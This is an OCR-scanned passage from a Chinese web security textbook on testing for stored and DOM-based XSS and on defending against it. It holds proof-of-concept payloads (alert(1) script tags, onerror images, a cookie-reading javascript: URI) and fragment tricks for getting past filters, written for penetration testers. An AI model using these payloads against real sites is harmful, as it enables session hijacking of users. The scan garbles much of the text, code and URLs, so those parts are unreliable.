数据 之 前 ， 许 多 应 用 程序 功能 需要 经 历 儿 个 阶段 的 操作 。 例 如 ， 注 
及 狐 用 户 、 处 理 购物 订单 、 转 账 等 操作 往往 需要 按 预定 的 顺序 提交 
人 。 为 避免 遗漏 任何 漏洞 ， 必 须 确保 每 次 测试 彻底 完 


(4) 在 探查 反射 型 XS 漏洞 时 ， 应 该 注意 可 控 的 受害 者 请 求 的 
每 一 个 方面 。 包 括 请 求 的 所 有 参数 和 每 一 个 HTTP 消 息 头 。 在 探查 
保存 型 XS 漏洞 时 ， 还 应 该 分 析 应 用 程序 用 于 接收 并 处 理 可 控 输 入 
的 任何 带 外 通道 。 任 何 这 类 通道 都 是 引入 保存 型 XSS 攻 击 的 适当 攻 
击 向 量 。 同 时 ， 审 查 在 应 用 程序 解析 过 程 中 得 到 的 结果 (请 参阅 第 
4 章 了 解 相 关内 容 ) ， 确 定 每 一 个 可 能 的 受 攻击 面 。 

(5) 如 果 应 用 程序 允许 文件 上 传 与 下 载 ， 应 始终 探查 这 种 功 
能 是 否 易于 受到 保存 型 XSS 攻 击 。 我 们 将 在 本 章 后 面部 分 讨论 测试 
这 类 功能 的 详细 技巧 。 

(6) 充分 发 挥 想象 ， 确 定 控制 的 数据 是 否 可 通过 任何 其 他 广 
法 保 在 在 应 用 程序 中 并 显示 给 其 他 用 户 。 例 如 ， 如 果 应 用 程序 的 搜 


索 功 能 显示 常用 的 搜索 项 列表 ， 丈 可 以 通过 多 次 搜索 这 个 列表 ， 引 


入 保存 型 XSS 有 效 载 舍 ， 即 使 主 搜 索 功 能 本 吴 安 全 地 处 理 输入 。 


确定 用 户 控制 的 数据 被 应 用 程序 保存 并 随后 在 浏览 吉 中 显示 的 每 
一 种 情况 后 ， 应 当 遵循 与 前 面 描述 的 探查 潜在 的 反射 型 XSS 漏 洞 时 相 
同 的 过 程 。 也 束 是 说 ， 决 定 需要 提交 哪些 输入 ， 以 在 周围 的 HIML 中 
舱 入 有 效 的 JavaScript， 人 然后 芝 旗 避 开 干扰 攻击 有 效 载 傈 执行 的 过 滤 。 


Vo fen 在 探查 反射 型 XSS 漏 洞 时， 每 次 测试 一 个 参数 ， 并 检 
查 每 个 啊 应 中 是 否 出 现 输入 ， 束 可 以 轻易 确定 哪些 请 求 参 数 易于 受 
到 攻击 。 但 是 ， 在 探查 保存 型 XSS 漏 洞 时 ， 要 确定 这 一 点 并 不 容 


易 。 如 来 在 每 个 页 面 的 每 一 个 参数 提交 相同 的 测试 字符 串 ， 那 么 你 
可 能 会 发 现 ， 这 个 字符 串 在 应 用 程序 的 许多 位 置 重复 出 现 ， 因 而 无 
法 准确 确定 每 个 出 现 的 字符 串 由 哪个 参数 负责 。 为 避免 出 现 这 个 问 
题 ， 在 探 得 保存 型 XSS 时 ， 可 以 为 每 个 参数 所 交 一 个 不 同 的 测试 字 
符 串 ， 例 如 ， 把 测试 字符 串 与 它 提交 到 其 中 的 字段 名 称 连接 起 来 。 


在 测试 保存 型 XSS 漏 洞 时 ， 我 们 还 可 以 采用 一 些 特殊 的 技巧 。 在 
下 面 几 节 中 ， 我 们 将 详细 介绍 这 些 技巧 。 

1. 在 Web 邮 件 应 用 程序 中 测试 XSS 

如 前 所 述 ， 由 于 Web 邮 件 应 用 程序 将 直接 从 第 三 方 收 到 的 内 容 包 
含 在 向 用 户 显示 的 应 用 程序 页 面 中 ， 因 此 ， 这 种 程序 本 身 就 存在 着 保 
存 型 XSS 攻 击 风险 。 要 测试 这 种 功能 ， 应 该 在 该 应 用 程序 上 创建 自己 
的 电子 邮件 账户 ， 并 通过 电子 邮件 向 自己 实施 大 量 XSS 攻 击 ， 然 后 在 
该 应 用 程序 中 查看 每 封 邮件 ， 确 定 是 否 有 任何 攻击 取得 成 功 。 

为 彻底 完成 这 一 任务 ， 你 需要 通过 电子 邮件 发 送 各 种 反常 的 
HTML 内 容 〈 如 我 们 在 测试 避 开 输入 过 滤 的 方法 时 所 述 ) 。 如 果 仅 限 
于 使 用 标准 电子 邮件 客户 端 ， 你 可 能 会 发 现 ， 无 法 完全 控制 原始 的 邮 
人 
了 o 

在 这 种 情况 下 ， 最 好 是 采用 其 他 方法 来 生成 电子 邮件 ， 以 便于 直 
接 控制 邮件 的 内 容 。 一 种 方法 是 使 用 UNIX sendmail 命 令 。 首 先 ， 需 要 
使 用 应 当 用 于 向 外 发 送 电子 邮件 的 邮件 服务 器 的 详细 信息 配置 电脑 ; 


然后 ， 可 以 在 文本 编辑 各 中 创建 原始 的 电子 邮件 ， 并 使 用 以 下 命令 发 
送 该 邮件 : 


sendmail -t test@example.org < email.txt 


以 下 为 原始 电子 邮件 文件 的 一 个 示例 。 在 消息 主体 中 测试 各 种 
XSS 有 效 载 何 和 避 开 过 滤 的 机 制 时 ， 也 可 以 尝试 指定 不 同 鸭 Content- 
Type 和 charset: 


MIME-Version: 1.0 

From: test@example.org 

Content-Type: text/html; charset=us-ascii 
Content-Transfer-Encoding: 7bit 

Subject: XSS test 


<html> 
<body> 
<img src=* ‘onerror=alert(1)> 
</body> 
</html> 


2. 在 上 传 文件 中 测试 XSS 

如 果 应 用 程序 允许 用 户 上 传 可 被 其 他 用 户 下 载 并 查看 的 文件 ， 就 
会 出 现 保存 型 XSS 漏 洞 ， 然 而 ， 这 种 漏洞 常常 被 人 们 忽略 。 如 今 的 应 
用 程序 通常 都 提供 文件 上 传 功能 ， 除 传统 的 用 于 文件 共享 的 工作 流 功 
能 外 ， 文 件 还 可 以 通过 电子 邮件 附件 的 形式 传送 给 Web 邮件 用 户 。 
像 文 件 则 可 以 附加 到 博客 文章 中 ， 并 且 可 以 用 作 定 制 的 头像 或 通过 相 
册 共 享 。 

应 用 程序 是 否 易于 受到 上 传 文件 的 攻击 ， 取 决 于 许多 影响 因素 : 

在 文件 上 传 过 程 中 ， 应 用 程序 可 能 会 限制 可 以 上 传 的 文件 的 扩 


口 在 文件 上 传 过 程 中 ， 应 用 程序 可 能 会 检查 文件 内 容 ， 以 确认 其 
征 否 为 所 需 的 格式 ， 如 JPEG ° 


口 在 文件 下 载 过 程 中 ， 应 用 程序 可 能 会 返回 Content-Type 消 息 头 ， 
以 指定 文件 所 包含 的 内 容 的 类 型 ， 如 image/jpeg。 

口 在 文件 下 载 过 程 中 ， 应 用 程序 可 能 会 返回 Content-Disposition 消 
EAL, PAPE RED bE as DOR CP RF ll a E EM, WITH KRHA 
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在 测试 文件 上 传 功能 时 ， 首 先 你 应 该 尝试 上 传 一 个 包含 概念 验证 
脚本 的 简单 HTML 文 件 。 如 果 该 文件 被 接受 ， 则 壬 试 以 正常 方式 下 载 
该 文件 。 如 果 应 用 程序 按 原样 返回 最 初 的 文件 ， 并 且 你 的 脚本 得 以 执 
行 ， 则 应 用 程序 肯定 易于 受到 攻击 。 

如 果 应 用 程序 阻止 上 传 的 文件 ， 则 答 试 使 用 各 种 文件 扩展 名 ， 包 
括 .txt 和 .jpg。 如 果 在 你 使 用 其 他 扩展 名 时 ， 应 用 程序 接受 包含 HTML 
的 文件 ， 则 应 用 程序 可 能 仍然 易于 受到 攻击 ， 具 体 取决 于 其 在 下 载 过 
程 中 如 何 传送 文件 。Web 邮 件 应 用 程序 通常 易于 受到 这 类 攻击 。 攻 击 
者 可 以 发 送 包 含 诱 惑 性 图 像 附件 的 电子 邮件 ， 如 果 用 户 查 看 该 附件 ， 
他 们 的 会 话 将 被 攻破 。 

即使 应 用 程序 返回 Content-Type 消 息 头 ， 指 定 下 载 文件 应 为 图 像 ， 
但 是 ， 如 果 文 件 实际 包含 的 是 HTML 内 容 ， 一 些 浏览 器 仍然 会 将 该 文 
件 作 为 HTML 人 处理 。 例 如 : 


HTTE/ 1-1 200 OF 
Content-Length: 25 
Content-Type: image/jpeg 


<script>alert (1)</script> 


旧版 的 Internet Explorer 了 驶 存在 这 种 缺陷 。 如 果 用 户 直接 请 求 一 个 
JPEG 文 件 (并 非 通 过 租 入 式 <img> 标 签 ; ， 那 么 在 收 到 上 述 响 应 时 ， 
IE 会 将 该 文件 的 内 容 当 做 HTML 处 理 。 虽 然 这 种 缺陷 已 经 得 到 修复 ， 
但 将 来 在 其 他 浏览 右 中 也 可 能 会 出 现 此 类 缺陷 。 

@ 混合 文件 攻击 

通常 ， 为 防范 上 述 攻 击 ， 应 用 程序 会 对 上 传 文件 的 内 容 执行 某 种 
确认 ， 以 确保 其 确实 包含 所 需 格式 的 数据 ， 如 图 像 。 但 是 ， 使 用 “混合 
A 仍然 可 以 对 这 些 应 用 程序 
实施 攻击 。 


Billy Rios 设 计 的 GIFAR 文 件 束 是 一 种 常见 的 混合 文件 。GIFAR 文 
件 包含 GIF 图 像 格 式 和 JAR (Java 档 案 ) 格式 的 数据 ， 并 且 是 这 两 种 格 
式 的 有 效 实例 。 这 是 因为 ， 与 GIF 格式 相关 的 文件 元 数据 位 于 文件 的 
开始 部 分 ， 与 JAR 格 式 相 关 的 元 数据 则 位 于 文件 的 结尾 部 分 。 因 此 ， 
如 宁 应 用 程序 允许 包含 GIF 数据 的 文件 ， 那 么 ， 在 确认 上 传 文件 的 内 
容 时 ， 该 应 用 程序 也 会 接受 GIFAR 文 件 。 
通常 ， 使 用 GIFAR 文 件 实 施 的 上 传 文件 攻击 由 以 下 步骤 组 成 。 

口 攻击 者 发 现 由 一 名 用 户 上 传 的 GIF 文 件 可 由 其 他 用 户 下 载 (如 社 
交 网 络 应 用 程序 中 的 用 户头 像 ， 的 应 用 程序 功能 。 

口 攻 击 者 构建 一 个 GIFAR 文 件 ， 在 其 中 包含 一 段 Java 代 码 ， 用 于 
支持 任何 执行 该 代码 的 用 户 的 会 话 。 

口 攻击 者 将 该 文件 作为 他 的 头像 上 传 。 因 为 其 中 包含 有 效 的 GIF 图 
像 ， 应 用 程序 将 接受 该 图 像 。 

口 攻击 者 确定 可 利用 上 传 的 文件 对 其 实施 攻击 的 适当 外 部 网 站 。 
该 网 站 可 能 为 攻击 者 自己 的 网 站 ， 或 允许 用 户 创建 任意 HTML (如 博 
客 ) 的 第 三 方 站 点 。 

口 在 该 外 部 网 站 上 ， 攻 击 者 使 用 <applet> 和 <object> 标 签 从 上 壕 社 
交 网 络 站 点 以 Java applet 的 形式 上 传 GIFAR 文 件 。 

口 如 果 用 户 访问 该 外 部 站 点 ， 攻 击 者 的 Java applet 将 在 其 浏览 器 中 
执行 。 与 包含 正常 脚本 的 文件 不 同 ， 在 遇 到 Java applet 时 ， 同 源 策略 的 
执行 方式 会 有 所 不 同 。Java applet 将 被 视 为 属于 加 载 它 的 域 ， 而 不 是 调 
用 它 的 域 。 因此， 攻击 者 的 applet 将 在 社交 网 络 应 用 程序 的 域 中 执行 。 
如 果 受 害 用 户 在 受到 攻击 时 已 登录 该 社交 网 络 应 用 程序 ， 或 者 最 近 曾 
登录 该 应 用 程序 并 选中 了 “保持 登录 状态 ” (stay logged in) 选项 ， 则 
攻击 者 的 applet 将 完全 控制 受害 用 户 的 会 话 ， 从 而 侵入 该 用 户 。 

当前 版 本 的 Java 浏 贤 器 插件 通过 确认 所 加 载 的 JAR 文 件 是 否 包 含 
混合 内 容 ， 从 而 阻止 了 这 种 使 用 GIFAR 文 件 的 特殊 攻击 。 但 是 ， 使 用 
混合 文件 隐藏 可 执行 文件 的 原理 仍然 适用 。 鉴 于 当前 所 使 用 的 客户 端 
可 执行 代码 格式 的 范围 不 断 扩 大 ， 攻 击 者 或 许可 以 以 其 他 格式 ， 或 在 
将 来 通过 其 他 方式 实施 类 似 的 攻击 。 

@ 在 通过 Ajax 上 传 的 文件 中 测试 XSS 

一 些 应 用 程序 使 用 Ajax 来 检索 和 呈现 在 片段 标识 符 之 后 指定 的 
URL 。 例 如 ， 应 用 程序 的 页 面 中 可 能 包含 以 下 链接 : 

http://wahh-app.com/#profile 


当 用 户 单 击 此 链接 时 ， 客 户 端 脚本 将 处 理 单 击 事件 ， 使 用 Ajax 来 
检索 在 片段 标识 符 之 后 显示 的 文件 ， 并 在 现 有 页 面 中 的 <div> 元 素 的 
innerHtml 中 设置 啊 应 。 这 样 可 提供 无 颖 的 用 户 体 验 ， 因 为 单 击 用 户 界 
面 中 的 选项 卡 将 更 新 所 显示 的 内 容 ， 而 无 须 重 新 加 载 整个 页 面 。 

在 这 种 情况 下 ， 如 果 应 用 程序 还 包含 其 他 人 允许 上 传 和 下 载 图 像 文 
件 (如 用 户头 像 ， 的 功能 ， 你 就 可 以 上 传 一 个 包含 舱 入 式 HTML 标 记 
的 有 效 图 像 文件 ， 并 构建 以 下 URL， 使 客户 端 代码 提取 该 图 像 并 将 其 
作为 HTML 显 示 : 

http://wahh-app.com/#profiles/images/15234917624.jpg 

HTMLA LR ASI AMAR PS, GARTER 
分 。 一 些 浏览 右 ， 包 括 Firefox 和 Safari， 乐 于 将 图 像 文件 以 HTML 格 式 
显示 。 图 像 的 二 进 制 部 分 将 显示 为 乱码 ， 而 任何 花 入 的 HTML 将 正常 


ET” 


YV ”提示 假设 潜在 的 受害 者 使 用 的 是 兼容 HTML5 的 浏览 器 ， 
如 琳 所 请 求 的 域 许可 ， 该 浏览 器 可 用 于 跨 域 传送 Ajax 请 示 。 在 这 种 
情况 下 ， 另 一 种 可 能 的 攻击 方法 ， 是 在 片段 标识 符 后 面 放置 一 个 绝 
对 URL， 指 定 一 个 位 于 可 与 目标 域 进行 Ajax 交 互 的 服务 器 上 的 、 完 
全 由 攻击 者 控制 的 外 部 HTML 文 件 。 如 果 客 户 端 脚本 不 确认 所 请 示 


的 UREL 是 否 在 同一 个 域 上 ， 客 户 端 远 程 文 件 包 含 攻 击 将 取得 成 功 。 
由 于 旧版 HTML 并 不 需要 对 URL 的 域 进行 此 类 确认 ， 因 此 ， 
ee 

| 用 的 漏洞 。 


使 用 以 下 方法 无 法 确定 基于 DOM 的 XSS 漏 洞 : 提交 一 个 特殊 的 字 
符 串 作为 每 个 参数 ， 然 后 监控 响应 中 是 否 出 现 该 字符 串 。 

确定 基于 DOM 的 XSS 漏 洞 的 基本 方法 是 ， 用 浏览 器 手动 浏览 应 用 
(ee ee 
H: 


"<script>alert (1)</script> 
"ya lere Cl) 77 
‘og leer Ly" 


ELEN boas NE BY OT, A DAT A Pi A 
本 ， 并 在 必要 时 引用 经 过 修改 的 URL 参 数 。 只 要 包含 cookie 的 对 话 框 
出 现 ， 就 表示 发 现 了 一 个 漏洞 (可 能 为 基于 DOM 的 或 其 他 类 型 的 XSS 
TEA eee eel enone 
过 程 。 

然而 ， 这 种 基本 的 方法 并 不 能 确定 所 有 基于 DOM 的 XSS 漏 洞 。 如 
上 文 所 述 ， 在 HTML 文档 中 注入 有 效 JavaScript 所 需 的 准确 语法 ， 取 决 
于 用 户 可 控制 的 字符 串 插 入 点 前 后 已 经 存在 的 语法 。 这 时 ， 可 能 需要 
终止 和 被单 引号 或 双 引 号 引用 的 字符 串 ， 或 者 结束 特定 的 标签 。 有 时 可 
能 需要 插入 狐 标 签 ， 但 有 时 并 不 需要 。 客 户 端 应 用 程序 代码 可 能 会 区 
试 确认 通过 DOM 获 得 的 数据 ， 但 它 仍然 易于 受到 攻击 。 

即使 应 用 程序 可 能 易于 受到 精心 设计 的 攻击 ， 但 如 果 插 入 标准 测 
试 字 符 串 仍 不 能 得 到 有 效 的 语法 ， 那 么 骨 入 式 JavaScript 将 不 会 执行 ， 
因此 也 不 会 有 对 话 框 出 现 。 由 于 无 法 在 每 个 参数 中 提交 每 一 种 可 能 的 
XSS 攻 击 字 符 串 ， 这 种 基本 的 探查 方法 必然 会 遗漏 大 量 的 漏洞 。 

确定 基于 DOM 的 XSS 漏 洞 的 一 种 更 加 有 效 的 方法 ， 是 检查 所 有 客 
户 端 JavaScript， 看 其 中 是 否 使 用 了 任何 可 能 会 导致 漏洞 的 DOM 属 性 。 
有 大 量 工具 可 用 于 目 动 完成 这 个 测试 过 程 。 其 中 一 个 有 用 的 工具 为 
DOMTracer， 下 载 该 工具 的 URL 如 下 所 示 : 

www.blueinfy.com/tools.html 


渗透 测试 步骤 


使 用 在 应 用 程序 解析 过 程 中 得 到 的 结果 〈 请 参阅 第 4 草 了 解 相 
， 检 查 每 一 段 客户 端 JavaScript， 看 其 中 是 否 出 现 以 下 

API， 它 们 可 用 于 访问 通过 一 个 专门 设计 的 URL 控 制 的 DOM 数 据 : 
口 document.1ocation 
口 document.URL 
口 document. URLUnencoded 
口 document.referrer 
D window.location 

确保 检查 出 现在 静态 HTML 页面 及 动态 生成 的 页 面 中 的 脚本 ， 
无 论 页 面 为 何 种 类 型 ， 或 者 是 否 有 参数 被 提交 给 页 面 ， 任 何 使 用 脚 
本 的 位 置 都 可 能 存在 基于 DOM 的 XSS 漏 洞 。 

在 每 一 个 使 用 上 述 API 的 位 置 ， 仔 细 检 查 那 里 的 代码 ， 确 定 应 
用 程序 如 何 处 理 用 户 可 控制 的 数据 ， 以 及 是 否 可 以 使 用 专门 设计 的 
输入 来 执行 任意 JavaScript。 尤 其 注意 检查 并 测试 控制 的 数据 被 传送 
至 以 下 任何 一 个 API 的 情况 : 
g document.write() 
g document.writeln() 
DQ document.body.innerHtml 
g eval() 
g window.execScript() 
g window.setInterval() 
g window.setTimeout() 


尝试 访问 


http://mdsec.net/error/18/ 
http://mdsec.net/error/22/ 
http://mdsec.net/error/28/ 


http://mdsec.net/error/31/ 
http://mdsec.net/error/37/ 
http://mdsec.net/error/41/ 
http://mdsec.net/error/49/ 
http://mdsec.net/error/53/ 
http://mdsec.net/error/56/ 
http://mdsec.net/error/61/ 


和 查找 反射 与 保存 型 XSS 漏 洞 时 一 样 ， 应 用 程序 可 能 会 执行 各 种 
TIE, SELERA m, EEM TA m, AE, af 
DERE a AS, ATRECI, H AMEE E a 
滤 的 方法 。 上 文 介 绍 的 用 于 避 开 针对 反射 型 XSS 攻 击 的 过 滤 拉 巧 在 此 
处 同样 适用 。 


尝试 访问 


http://mdsec.net/error/92/ 


http://mdsec.net/error/95/ 

http://mdsec.net/error/107/ 
http://mdsec.net/error/109/ 
http://mdsec.net/error/118/ 


某 些 情 况 下 ， 服 务 器 端 应 用 程序 可 能 会 实施 和 旧 在 阻止 基于 DOM 的 
XSS 攻 击 的 过 滤 。 即 使 客户 端 出 现 易 受 攻击 的 操作 ， 服 务 颖 并 不 在 啊 
应 中 返回 用 户 提交 的 数据 ， 但 是 URL 仍 然 被 提交 给 了 服务 器 ;， 因 此， 
当 应 用 程序 检测 到 恶 划 有 效 载 集 时 ， 它 会 对 数据 进行 确认 ， 且 不 会 返 
回 易 受 攻击 的 客户 端 脚本 。 

如 宁 遇 到 这 种 防御 ， 渗 透 测 试 员 应 该 演 试 使 用 前 面 在 查找 反射 型 
XSS 漏 洞 时 描述 的 每 一 种 可 能 避 开 过 着 的 攻击 方法 ， 测 试 服务 器 数据 
确认 机 制 的 可 靠 性 。 除 这 些 攻 击 外 ， 还 有 几 种 专门 针对 基于 DOM 的 
XSS 汤 洞 的 技巧 可 用 于 帮助 攻击 有 效 载 集 避 开 服 务 絮 并 确认 。 

当 客 户 端 脚 本 从 URL 中 提取 参数 值 时 ， 它 们 很 少将 查询 字符 串 正 
确 解析 成 名 / 值 对 。 相 反 ， 它 们 通常 会 在 URL 中 搜索 后 面 紧 跟 痢 等 号 
(=) 的 参数 名 称 ， 然 后 提取 出 等 号 以 后 直到 URL 结 束 位 置 的 内 容 。 
这 种 行为 能 够 以 两 种 方式 加 以 利用 : 

口 如 有 果 服 务 右 根据 每 个 参数 而 不 是 整个 URL 应 用 确认 机 制 ， 那 么 
S aaa Umea ner 

o 例如 : 


这 时 ， 虚 构 的 参数 被 服务 器 忽略 ， 因 此 不 会 受到 任何 过 滤 。 但 
征 ， 因 为 客户 端 脚本 在 查询 字符 串 中 搜索 message=， 并 提取 其 后 的 全 
部 内 容 ， 所 以 它 处 理 的 字符 串 中 正好 包含 该 有 效 载 合 。 

口 如 末 服 务 硕 对 整个 URL 而 不 仅仅 是 消 妃 参数 应 用 确认 机 制 ， 仍 
人 
H: 


< cript» 


http://mds net/error/82/Error.ashx?message=Sorryt2Zctanterrort 


occurred#<script>alert (1)</script> 


这 时 ， 片 断 字符 串 仍然 属于 URL 的 一 部 分 ， 因 此 被 保存 在 DOM 
中 ， 并 由 易 受 攻击 的 客户 端 脚本 处 理 。 但 是 ， 由 于 浏览 器 并 不 将 URL 
中 的 片断 部 分 提交 给 服务 器 ， 因 此 攻击 字符 串 不 会 传送 到 服务 器 中 ， 
因而 不 会 被 任何 服务 器 端 过 滤 所 阻止 。 因 为 客户 站 脚本 提取 message= 
后 面 的 全 部 内 容 ， 所 以 有 效 载 何 仍然 被 复 制 到 HTML 页 面 源 代码 中 。 


尝试 访问 


http://mdsec.net/error/76/ 
http://mdsec.net/error/82/ 


SALA “我 们 检查 每 个 用 户 请 求 中 是 否 存在 嵌入 式 脚本 
标签， 因此 不 可 能 受到 XSS 攻 击 。” 


K eee 现在 可 以 找到 3 个 原因 证 明 这 种 看 法 
并 不 正确 。 

口 在 一 些 XSS 漏 洞 中 ， 攻 击 者 控制 的 数据 被 直接 插入 到 现 有 的 
JavaScript 脚 本 中 ， 因 此 攻击 者 不 需要 使 用 任何 脚本 标 答 ， 或 采用 其 
他 方法 引入 脚本 代码 。 在 其 他 情况 下 ， 仍 然 不 需要 使 用 任何 脚本 标 
签 ， 只 需 注入 一 个 包含 JavaScript 的 事件 处 理 器 即 可 。 

口 如 果 应 用 程序 接受 通过 市 外 通道 传送 的 数据 ， 并 在 它 的 Web 
界面 中 显示 这 些 数 据 ， 那 么 攻击 者 不 用 使 用 HTTP 提 交 任 何 恶意 有 
效 载 傈 ， 束 可 以 利用 任何 保存 型 XSS 汤 洞 。 

口 针 对 基于 DOM 的 XSS 漏 洞 的 攻击 不 需要 回 服 务 亏 提交 任何 恶 
意 有 效 载 位 。 如 果 使 用 片断 技巧 ， 那 么 有 效 载 入 将 始终 位 于 客户 


X, 


y 


— EE hy FARE EA BE DV AY IAS, EE EB ET E 
加 严格 的 解析 。 例 如 ， 它 在 URL 中 搜索 后 面 紧 跟着 等 号 的 参数 名 称 ， 
然后 提取 等 号 后 面 的 内 容 ， 直 到 遇 到 一 个 分 隔 符 ， 如 人 && 或 #。 在 这 种 情 
况 下 ， 可 以 对 前 面 的 两 个 攻击 进行 如 下 修改 : 


http: //mdsec.net/error/79/Error.ashx?foomessage=<script>alert(1)</seript 


Sorryt2c+an+error+occurred 
在 这 两 个 示例 中 ， 第 一 个 message= 后 面 紧 跟着 攻击 字符 串 ， 其 中 
没有 任何 干扰 脚本 执行 的 分 隅 符 ， 因 此 攻击 有 效 载 千 将 得 到 处 理 ， 且 


or /79/Error.ashx#message=<script>alert(1)</scri 


被 复制 到 HTML 页 面 源 代码 中 。 


尝试 访问 


http://mdsec.net/error/79/ 


有 时 候 ， 基 于 DOM 的 数据 经 过 了 非常 复杂 的 处 理 ， 仅 通过 静态 审 
查 JavaScript 源 代码 可 能 很 难 追 踪 用 户 控制 的 数据 采用 的 不 同 路 径 以 及 
对 它 进 行 的 各 种 操作 。 在 这 种 情况 下 ， 使 用 JavaScript 调 试 器 动态 监控 
脚本 的 执行 情况 可 能 会 有 很 大 帮助 。Firefox 浏 览 器 的 FireBug 扩 展 是 一 
球 用 于 监控 客户 端 代码 与 内 容 的 优秀 调试 器 ， 可 用 于 设置 断 点 、 监 视 
1 为 我 们 了 解 复 杂 脚 本 的 执行 过 程 提供 了 极 大 的 


更 利 


锌 。 铺 误 观点 “我 们 很 安全 ， 因 为 Web 应 用 程序 扫描 器 没有 发 


现任 何 XSS 漏 洞 。” 
第 19 半 将 会 介绍 ， 一 些 Web 应 用 程序 扫描 顷 能 够 发 现 大 多 数 肖 


见 的 漏洞 ， 包 括 XSS 漏 洞 。 但 是 ， 很 显然 ， 许 多 XSS 漏 洞 很 难 检测 
出 来 ， 发 现 它们 可 能 需要 进行 大 量 探 查 与 试验 。 束 目前 而 言 ， 还 没 
有 任何 目 动工 具 能 够 准确 确定 所 有 这 些 漏 洞 。 


12.4 防止 XSS 攻 击 


尽管 XSS 的 表现 形式 各 异 ， 利 用 方法 各 不 相同 ， 但 从 概念 上 讲 ， 
防止 这 种 漏洞 实际 上 相当 简单 。 预 防 它们 之 所 以 存在 困难 ， 主 要 在 于 
我 们 无 法 确定 用 户 可 控制 的 数据 以 潜在 危险 的 方式 被 处 理 的 每 一 种 情 
况 。 任 何 应 用 程序 页 面 都 会 处 理 并 显示 一 些 用 户 数 据 。 除 核心 功能 
外 ， 错 误 消 息 与 其 他 位 置 也 可 能 产生 漏洞 。 因 此 ，XSS 漏 洞 普遍 存在 
也 就 不 足 为 奇 了 ， 即 使 在 最 为 注重 安全 的 应 用 程序 中 也 是 如 此 。 

由 于 造成 漏洞 的 原因 各 不 相同 ， 一 部 分 防御 方法 适用 于 反映 型 与 
保存 型 XSS 漏 洞 ， 而 另 一 些 则 适用 于 基于 DOM 的 XSS 漏 洞 。 


用 户 可 控制 的 数据 未 经 适当 确认 与 净化 束 被 复制 到 应 用 程序 啊 应 
中 ， 这 有 是 造成 反射 型 与 你 存 型 XSS 漏 洞 的 根本 原因 。 由 于 数据 被 插入 
到 一 个 HTML 页面 的 源 代 码 中 ， 亚 意 数据 束 会 干扰 这 个 页 面 ， 不 仅 修 
改 它 的 内 容 ， 还 会 破坏 它 的 结构 (有 影响 引用 字符 串 、 起 始 与 结束 标 
签 、 注 入 脚本 等 ) 。 

为 消除 反射 型 与 保存 型 XSS 调 洞 ， 诈 先 必 须 确 定 应 用 程序 中 用 户 
可 控制 的 数据 被 复制 到 啊 应 中 的 每 一 种 情形 。 这 包括 从 当前 请 求 中 复 
制 的 数据 以 及 用 户 之 前 输入 的 保存 在 应 用 程序 中 的 数据 ， 还 有 通过 市 
外 通道 输入 的 数据 。 为 确保 确定 每 一 种 情形 ， 除 仔细 审查 应 用 程序 的 
全 部 源 代码 外 ， 没 有 其 他 更 好 的 办 法 。 

确定 所 有 可 能 存在 XSS 风 险 、 需 要 适当 进行 防御 的 操作 后 ， 需 要 
采取 一 种 三 重 防 御 方 法 阻止 漏洞 的 发 生 。 这 种 方法 由 以 下 3 个 因素 组 


成 

m) 确认 输入 ; 

口 确 认输 出 ; 

口 消除 危险 的 插入 点 。 

如 果 应 用 程序 需要 允许 用 户 以 HTML 格 式 创建 内 容 (如 允许 在 注 
释 中 使 用 HTML 的 博客 应 用 程序 ) ， 这 时 应 谨慎 使 用 这 种 方法 。 我 们 
将 在 介绍 常规 防御 技巧 后 讨论 与 这 种 情况 有 关 的 一 些 特定 注意 事项 。 

1. 确认 输入 

如 果 应 用 程序 在 某 个 位 置 收 到 的 用 户 提交 的 数据 将 来 有 可 能 被 复 
制 到 它 的 啊 应 中 ， 应 用 程序 应 根据 这 种 情形 对 这 些 数据 执行 尽 可 能 严 
格 的 确认 。 可 能 需要 确认 的 数据 的 特性 包括 以 下 几 点 。 

口 数 据 不 是 太 长 。 

口 数据 仅 包 含 某 组 合法 字符 。 

口 数 据 与 一 个 特殊 的 正规 表达 式 相 匹配 。 

根据 应 用 程序 希望 在 每 个 字段 中 收 到 的 数据 类 型 ， 应 尽 可 能 限制 
性 地 对 姓名 、 电 子 邮件 地 址 、 账 号 等 应 用 不 同 的 确认 规则 。 

2. 确认 输出 

如 果 应 用 程序 将 某 位 用 户 或 第 三 方 提交 的 数据 复制 到 它 的 响应 
中 ， 那 么 应 用 程序 应 对 这 些 数 据 进行 HTML 编 码 ， 以 净化 可 能 的 恶意 
字符 。HTML 编 码 指 用 对 应 的 HTML 实 体 蔡 代 字 面 量 字 符 。 这 样 做 可 


确 你 浏览 锅 安 全 处 理 可 能 为 恶意 的 字符 ， 把 它们 当做 HTML 文 档 的 内 
容 而 非 结 构 处 理 。 一 些 经 党 造成 问题 的 字符 的 HTML 编 码 如 下 : 


口 I 

口 T T 

口 &——_& 

g <—&md&:< 
g> > 


除 这 些 常用 的 编码 外 ， 实 际 上 ， 任 何 字 符 都 可 以 用 它 的 数字 
ASCII 字 符 代 码 进行 HTML 编 码 ， 举 例如 下 : 
0 %—% 


米 米 


口 

应 该 注意 ， 在 将 用 户 输入 插入 到 标签 属性 值 中 时 ， 浏 览 器 会 首先 
对 该 值 进行 HTMI 解码 ， 然 后 执行 其 他 处 理 。 在 这 种 情况 下 ， 仅 仅 对 
任何 在 正常 情况 下 存在 问题 的 字符 进行 HTML 编 码 的 防御 机 制 可 能 会 
失效 。 确 实 ， 如 前 所 述 ， 对 于 某 些 过 滤 ， 攻 击 者 可 以 避免 在 有 效 载荷 
中 使 用 HTML 编 码 的 字符 。 例 如 ; 


<img src="javascript&#58;alert (document .cookie) "> 


<img src="image.gif" onload="alert (&apos;xss&apos;)"> 


我 们 在 下 一 节 将 会 讲 到 ， 最 好 是 避免 在 这 些 位 置 插入 用 户 可 控制 
的 数据 。 如 果 在 某 些 情况 必须 这 样 做 ， 在 执行 操作 时 应 特别 小 心 ， 以 
防止 任何 可 以 避免 过 滤 的 情况 。 人 例如， 如果 将 用 户 输入 揪 入 到 事件 处 
理 器 中 的 引用 JavaScript 字 符 串 中 ， 应 使 用 反 斜 线 正 确 转 义 用 户 输入 中 
的 任何 引号 或 反 斜 线 ， 并 且 HTML 编 码 应 包括 & 和 ; 字符 ， 以 防止 攻 
击 者 自己 执行 HTML 编 码 。 

在 将 用 户 可 控制 的 字符 串 复制 到 服务 器 的 啊 应 中 之 前 ，ASP.NET 
应 用 程序 可 以 使 用 Server.HTMLEncode API 净 化 其 中 的 常见 恶意 字符 。 
这 个 API 把 字符 "&< 和 > 转换 成 它们 对 应 的 HTML 实 体 ， 并 且 使 用 数字 
形式 的 编码 转换 任何 大 于 0x7f 的 ASCII 字 符 。 

